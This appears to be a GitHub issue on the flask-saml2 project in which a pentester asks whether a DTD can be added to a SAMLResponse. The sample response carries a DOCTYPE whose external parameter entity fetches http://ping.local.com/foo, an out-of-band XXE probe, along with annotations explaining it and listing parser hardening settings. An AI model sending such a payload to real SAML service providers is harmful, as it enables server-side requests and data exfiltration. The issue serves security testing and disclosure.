flask-saml2
How to add a DTD to the SAMLResponse?
Hello,
I came across this awesome project of yours while pentesting, and I have some questions.
- When the IdP issues a SAMLResponse, is it possible for a DTD declaration to be added to the beginning of the SAMLResponse? Like this:
<?xml version="1.0"?>
<!-- Sample SAMLResponse from the question, with a DOCTYPE placed ahead of the root element. -->
<!-- The internal subset below declares the parameter entity %remote with a SYSTEM identifier (an http:// URL)
     and then references %remote; and %send;. %send is not declared anywhere in this document; presumably it is
     expected to come from whatever %remote resolves to. A parser that processes DTDs would make an outbound
     request while reading this prolog. -->
<!-- Defensive note: SAML messages have no need for a DTD. A service provider should parse incoming responses
     with DTD loading, entity resolution and network access turned off (for example via defusedxml, or
     lxml's XMLParser(resolve_entities=False, load_dtd=False, no_network=True)) and reject any message that
     carries a DOCTYPE. The DOCTYPE sits outside the root element and is read by the parser before any
     signature check can run, so signature validation alone does not protect the parser. -->
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://ping.local.com/foo"> %remote; %send;]>
<!-- Root element follows. The Response and the Assertion each carry a ds:Signature whose content is elided
     as "..." on the page, so what the signatures reference cannot be checked from this listing. -->
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:9000/saml/acs/" ID="_b4e5466d30d343a39b281c89699558dd" InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_79630753cb3f44158e5cae1849045bf3" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
<saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="http://localhost:9000/saml/metadata.xml">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00" Recipient="http://localhost:9000/saml/acs/"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00">
<saml:AudienceRestriction>
<saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
<saml:AttributeStatement>
<saml:Attribute Name="foo" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue>bar</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response>
Thanks in advance for your help. Regards, @abrahack.